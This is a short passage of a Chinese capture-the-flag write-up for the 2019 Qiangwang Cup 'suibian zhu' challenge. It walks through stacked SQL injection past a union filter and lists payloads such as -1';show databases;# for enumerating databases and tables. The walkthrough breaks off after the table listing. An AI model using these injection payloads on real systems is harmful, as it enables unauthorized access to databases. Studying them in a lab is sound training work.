[強網杯 2019]隨便注(預處理/更改表名列名)

打開環境 -1’ or 1=1# 有注入 1’ union select 1,2# 有過濾,preg_match會過濾大小寫。union查詢無法使用了。 嘗試堆疊注入";"將查詢分開。 查詢所有數據庫: -1’;show databases;# 顯示正常,發現是mysql數據庫 查詢當前數據庫的表: -1;show tables;# 查詢這兩個表中的字段,這裏可以使用show也可以使用desc -
相關文章
相關標籤/搜索